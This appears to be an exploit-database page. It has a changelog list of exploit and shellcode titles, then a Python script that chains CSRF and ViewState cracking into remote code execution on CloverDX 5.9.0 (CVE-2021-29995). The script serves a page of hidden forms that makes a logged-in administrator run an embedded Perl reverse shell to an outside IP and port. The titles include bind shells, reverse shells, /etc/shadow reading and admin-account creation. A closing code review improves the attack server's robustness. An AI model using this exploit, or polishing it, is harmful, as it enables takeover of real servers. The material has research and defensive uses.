
95 changes to exploits/shellcodes Product Key Explorer 4.2.7 - 'multiple' Denial of Service (PoC) Managed Switch Port Mapping Tool 2.85.2 - Denial of Service (PoC) AgataSoft PingMaster Pro 2.1 - Denial of Service (PoC) Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC) WordPress Plugin WPGraphQL 1.3.5 - Denial of Service Sandboxie 5.49.7 - Denial of Service (PoC) WebSSH for iOS 14.16.10 - 'mashREPL' Denial of Service (PoC) iDailyDiary 4.30 - Denial of Service (PoC) RarmaRadio 2.72.8 - Denial of Service (PoC) DupTerminator 1.4.5639.37199 - Denial of Service (PoC) Color Notes 1.4 - Denial of Service (PoC) Macaron Notes great notebook 5.5 - Denial of Service (PoC) My Notes Safe 5.3 - Denial of Service (PoC) n+otes 1.6.2 - Denial of Service (PoC) Telegram Desktop 2.9.2 - Denial of Service (PoC) Mini-XML 3.2 - Heap Overflow Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (2) Solaris 10 (Intel) - 'dtprintinfo' Local Privilege Escalation (3) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (1) Solaris 10 (SPARC) - 'dtprintinfo' Local Privilege Escalation (2) MariaDB 10.2 - 'wsrep_provider' OS Command Execution Microsoft Internet Explorer 11 and WPAD service 'Jscript.dll' - Use-After-Free Visual Studio Code 1.47.1 - Denial of Service (PoC) DELL dbutil_2_3.sys 2.3 - Arbitrary Write to Local Privilege Escalation (LPE) MySQL User-Defined (Linux) x32 / x86_64 - 'sys_exec' Local Privilege Escalation (2) Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial of Service (PoC) GNU Wget < 1.18 - Arbitrary File Upload (2) WebCTRL OEM 6.5 - 'locale' Reflected Cross-Site Scripting (XSS) E-Learning System 1.0 - Authentication Bypass PEEL Shopping 9.3.0 - 'Comments' Persistent Cross-Site Scripting GetSimple CMS 3.3.16 - Persistent Cross-Site Scripting EgavilanMedia User Registration & Login System with Admin Panel 1.0 - Persistent Cross-Site Scripting Selea Targa 512 IP OCR-ANPR Camera - Stream Disclosure (Unauthenticated) Library System 1.0 - 
Authentication Bypass Web Based Quiz System 1.0 - 'name' Persistent Cross-Site Scripting Dolibarr ERP 11.0.4 - File Upload Restrictions Bypass (Authenticated RCE) GetSimple CMS My SMTP Contact Plugin 1.1.1 - Cross-Site Request Forgery GravCMS 1.10.7 - Unauthenticated Arbitrary File Write (Metasploit) Umbraco v8.14.1 - 'baseUrl' SSRF Cacti 1.2.12 - 'filter' SQL Injection GetSimple CMS Custom JS 0.1 - Cross-Site Request Forgery Internship Portal Management System 1.0 - Remote Code Execution(Unauthenticated) Markdown Explorer 0.1.1 - Persistent Cross-Site Scripting Xmind 2020 - Persistent Cross-Site Scripting Tagstoo 2.0.1 - Persistent Cross-Site Scripting SnipCommand 0.1.0 - Persistent Cross-Site Scripting Moeditor 0.2.0 - Persistent Cross-Site Scripting Marky 0.0.1 - Persistent Cross-Site Scripting StudyMD 0.3.2 - Persistent Cross-Site Scripting Freeter 1.2.1 - Persistent Cross-Site Scripting Markright 1.0 - Persistent Cross-Site Scripting Markdownify 1.2.0 - Persistent Cross-Site Scripting Anote 1.0 - Persistent Cross-Site Scripting Subrion CMS 4.2.1 - Arbitrary File Upload Printable Staff ID Card Creator System 1.0 - 'email' SQL Injection Schlix CMS 2.2.6-6 - Arbitary File Upload (Authenticated) Selenium 3.141.59 - Remote Code Execution (Firefox/geckodriver) CHIYU IoT Devices - Denial of Service (DoS) Zenario CMS 8.8.52729 - 'cID' SQL injection (Authenticated) TextPattern CMS 4.8.7 - Remote Command Execution (Authenticated) WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS) Scratch Desktop 3.17 - Remote Code Execution Church Management System 1.0 - Arbitrary File Upload (Authenticated) Phone Shop Sales Managements System 1.0 - Arbitrary File Upload Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS) WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting ForgeRock Access Manager 14.6.3 - 
Remote Code Execution (RCE) (Unauthenticated) KevinLAB BEMS 1.0 - Authentication Bypass Event Registration System with QR Code 1.0 - Authentication Bypass CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password) qdPM 9.2 - Password Exposure (Unauthenticated) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit) GeoVision Geowebserver 5.3.3 - Local FIle Inclusion Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated) Umbraco CMS 8.9.1 - Directory Traversal Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated) Dolibarr ERP 14.0.1 - Privilege Escalation Compro Technology IP Camera - 'killps.cgi' Denial of Service (DoS) Drupal Module MiniorangeSAML 8.x-2.22 - Privilege escalation Phpwcms 1.9.30 - Arbitrary File Upload Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes) Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes) Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes) Windows/x86 - Add User Alfred to Administrators/Remote Desktop Users Group Shellcode (240 bytes) Windows/x64 - Dynamic Null-Free WinExec PopCalc Shellcode (205 Bytes) Windows/x64 - Dynamic NoNull Add RDP Admin (BOKU:SP3C1ALM0V3) Shellcode (387 Bytes) Linux/x86 - setreuid(0) + execve(_/bin/sh_) Shellcode (29 bytes) Linux/x86 - Bind (User Specified Port) Shell (/bin/sh) Shellcode (102 bytes) Linux/x86 - Reverse (dynamic IP and port/TCP) Shell (/bin/sh) Shellcode (86 bytes) Linux/x86 - Egghunter Reverse TCP Shell dynamic IP and port Shellcode Windows/x86 - WinExec PopCalc PEB & Export Directory Table NullFree Dynamic Shellcode (178 bytes) Windows/x86 - MessageBoxA PEB & Export Address Table NullFree/Dynamic Shellcode (230 bytes)
137 lines
No EOL
12 KiB
Python
Executable file
# Exploit Title: CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF) to Remote Code Execution (RCE)
# Date: 14.04.2021
# Exploit Author: niebardzo
# Vendor Homepage: https://www.cloverdx.com/
# Software Link: https://github.com/cloverdx/cloverdx-server-docker
# Version: 5.9.0, 5.8.1, 5.8.0, 5.7.0, 5.6.x, 5.5.x, 5.4.x
# Tested on: Docker image - https://github.com/cloverdx/cloverdx-server-docker
# CVE : CVE-2021-29995
# Replace the target, payload and port to host the exploitation server. Exploit requires, inbound connection to CloverDX
# Victim authenticated to CloverDX and the java to run the ViewStateCracker.java.
# Reference for cracking ViewState:
# https://jazzy.id.au/2010/09/20/cracking_random_number_generators_part_1.html
# https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
import http.server
import socketserver
import requests
from urllib.parse import urlparse
from urllib.parse import parse_qs
from bs4 import BeautifulSoup
import subprocess
import sys
import json
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
self.send_response(200)
self.send_header("Content-Type", "text/html; charset=utf-8")
self.end_headers()
# replace with your own target
target = "http://localhost:8080"
query_comp = parse_qs(urlparse(self.path).query)
if "target" in query_comp:
target = query_comp["target"][0]
req = requests.get(target+"/clover/gui/login.jsf")
if req.status_code != 200:
sys.exit(-1)
# parse the reponse retrieve the ViewState
soup = BeautifulSoup(req.text, "html.parser")
cur_view_state = soup.find("input", {"name": "javax.faces.ViewState"})["value"]
# Use the ViewstateCracker.java to get new Viewstate.
new_view_state = subprocess.check_output(["java", "ViewstateCracker.java", cur_view_state])
new_view_state = new_view_state.decode("utf-8").strip()
print(new_view_state)
if new_view_state == "6927638971750518694:6717304323717288036":
html = ("<!DOCTYPE html><html><head></head><body><h1>Hello Clover Admin!</h1><br>"
+ "<script>window.setTimeout(function () { location.reload()}, 1500)</script></body></html>")
else:
html = ("<!DOCTYPE html><html><head>"
+ "<script>"
+ "function exec1(){document.getElementById('form1').submit(); setTimeout(exec2, 2000);}"
+ "function exec2(){document.getElementById('form2').submit(); setTimeout(exec3, 2000);}"
+ "function exec3(){document.getElementById('form3').submit(); setTimeout(exec4, 2000);}"
+ "function exec4(){document.getElementById('form4').submit();}"
+ "</script>"
+ "</head><body onload='exec1();'><h1>Hello Clover Admin! Please wait here, content is loading...</h1>"
+ "<script>history.pushState('','/');</script>"
+ "<form target='if1' id='form1' method='GET' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if2' id='form2' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='headerForm:manualListenerItem' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='allContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='headerForm:manualListenerItem' name='headerForm:manualListenerItem'>"
+ "<input type='hidden' value='headerForm' name='headerForm'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if3' id='form3' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.source'>"
+ "<input type='hidden' value='manualListeneForm:taskType' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='manualListeneForm:taskFormFragment' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='valueChange' name='javax.faces.behavior.event'>"
+ "<input type='hidden' value='change' name='javax.faces.partial.event'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>"
+ "<input type='hidden' value='on' name='manualListeneForm:saveRunRecord_input'>"
+ "<input type='hidden' value='true' name='manualListeneForm:manualVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<form target='if4' id='form4' enctype='application/x-www-form-urlencoded' method='POST' action='{}/clover/gui/event-listeners' style='visibility: hidden;'>".format(target)
+ "<input type='hidden' value='true' name='javax.faces.partial.ajax'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='javax.faces.source'>"
+ "<input type='hidden' value='@all' name='javax.faces.partial.execute'>"
+ "<input type='hidden' value='rightContent' name='javax.faces.partial.render'>"
+ "<input type='hidden' value='manualListeneForm:execute_button' name='manualListeneForm:execute_button'>"
+ "<input type='hidden' value='manualListeneForm' name='manualListeneForm'>"
+ "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propName'>"
+ "<input type='hidden' value='' name='manualListeneForm:properties:propertiesTable:propValue'>"
+ "<input type='hidden' value='' name='manualListeneForm:taskType_focus'>"
+ "<input type='hidden' value='shell_command' name='manualListeneForm:taskType_input'>"
#
# Below is the HTML encoded perl reverse, replace with your own payload, remember to HTML encode.
#
+ "<input type='hidden' value='perl -e 'use Socket;$i="192.168.65.2";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'' name='manualListeneForm:shellEditor'>"
+ "<input type='hidden' value='' name='manualListeneForm:workingDirectory'>"
+ "<input type='hidden' value='10000' name='manualListeneForm:timeout'>"
+ "<input type='hidden' value='true' name='manualListeneForm:scriptVariablesList_collapsed'>"
+ "<input type='hidden' value='{}' name='javax.faces.ViewState'>".format(new_view_state.replace(":",":"))
+ "<input type='submit' value='' style='visibility: hidden;'></form> "
+ "<iframe name='if1' style='display: hidden;' width='0' height='0' frameborder='0' ></iframe>"
+ "<iframe name='if2' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if3' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "<iframe name='if4' style='display: hidden;' width='0' height='0' frameborder='0'></iframe>"
+ "</body></html>")
self.wfile.write(bytes(html,"utf-8"))
base64_enc_viewstatecracker = "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"
#
# This drops ViewstateCracker.java from above, ref: https://blog.securityevaluators.com/cracking-javas-rng-for-csrf-ea9cacd231d2
#
with open("ViewstateCracker.java","w") as f:
f.write(b64decode(bytes(base64_enc_viewstatecracker, 'utf-8')).decode('utf-8'))
exploit_handler = ExploitHandler
PORT = 6010
exploit_server = socketserver.TCPServer(("", PORT), exploit_handler)
exploit_server.serve_forever() |
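
Review bot: In `do_GET`, the `target` query parameter is read from the incoming request and passed straight to `requests.get(target+"/clover/gui/login.jsf")` with no validation and no timeout, while the server binds to `("", PORT)`, that is, every interface. Anyone who can reach port 6010 can therefore make this host issue an outbound request to a URL of their choosing, and a slow endpoint stalls the single-threaded handler. Pin `target` to the fixed value or check it against an allow-list, pass `timeout=` to `requests.get`, and bind to a specific address. Separately, `sys.exit(-1)` on a non-200 response raises `SystemExit` inside the request handler, which propagates out of `serve_forever()` and stops the whole server; returning an error response would keep the failure local to that request. `import json` is unused.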